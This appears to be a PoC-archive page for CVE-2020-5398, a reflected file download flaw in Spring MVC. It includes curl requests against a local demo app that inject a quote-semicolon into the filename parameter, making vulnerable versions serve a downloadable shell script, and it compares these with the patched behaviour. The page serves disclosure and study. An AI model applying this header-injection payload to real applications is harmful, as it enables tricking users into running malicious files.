关联漏洞
标题:Vmware Spring Framework 跨站脚本漏洞 (CVE-2020-5398)Description:Vmware Spring Framework是美国威睿(Vmware)公司的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Pivotal Software Spring Framework 5.2.3之前的5.2.x版本、5.1.13之前的5.1.x版本和5.0.16之前的5.0.x版本中存在跨站脚本漏洞。远程攻击者可通过实施反射型文件下载(RFD)攻击利用该漏洞获取敏感信息。
Description
CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC
介绍
# CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC
> In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a “Content-Disposition” header in the response where the filename attribute is derived from user supplied input.
## Using
1.
```
./gradlew bootrun
```
Listen on `127.0.0.1:8080`.
2.
```
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT
Hello, World
```
Start download `sample.txt` file.
## PoC
### Insecure Version(Spring Web 5.2.2)
```
curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT
#!/bin/bash
id
```
Start download `sample.sh` file.(Shell file)
### Secure Version(Spring Web 5.2.3)
```
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT
#!/bin/bash
id
```
Start download `sample.sh";.txt` file.(Text file)
## References
- [CVE-2020-5398: RFD Attack via “Content-Disposition” Header Sourced from Request Input by Spring MVC or Spring WebFlux Application | Security | Pivotal](https://pivotal.io/security/cve-2020-5398)
- [NVD - CVE-2020-5398](https://nvd.nist.gov/vuln/detail/CVE-2020-5398)
- What's RFD Attack?
- [eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf](https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf)
- [Reflected File Download - OWASP](https://wiki.owasp.org/index.php/Reflected_File_Download)
- Fix Commit
- [ContentDisposition refactoring · spring-projects/spring-framework@956ffe6](https://github.com/spring-projects/spring-framework/commit/956ffe68587c8d5f21135b5ce4650af0c2dea933)
文件快照
[4.0K] /data/pocs/27718de8d31e2aea7a1ce63c10fb1d9463dd1e88
├── [ 939] build.gradle
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 55K] gradle-wrapper.jar
│ └── [ 232] gradle-wrapper.properties
├── [5.2K] gradlew
├── [2.2K] gradlew.bat
├── [1.0K] LICENSE.md
├── [2.3K] README.md
├── [ 393] settings.gradle
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] com
│ │ └── [4.0K] example
│ │ └── [4.0K] cve_2020_5398
│ │ ├── [4.0K] controller
│ │ │ └── [1.6K] MainController.java
│ │ └── [ 328] Cve20205398Application.java
│ └── [4.0K] resources
│ └── [ 1] application.properties
└── [4.0K] test
└── [4.0K] java
└── [4.0K] com
└── [4.0K] example
└── [4.0K] cve_2020_5398
└── [ 222] Cve20205398ApplicationTests.java
15 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。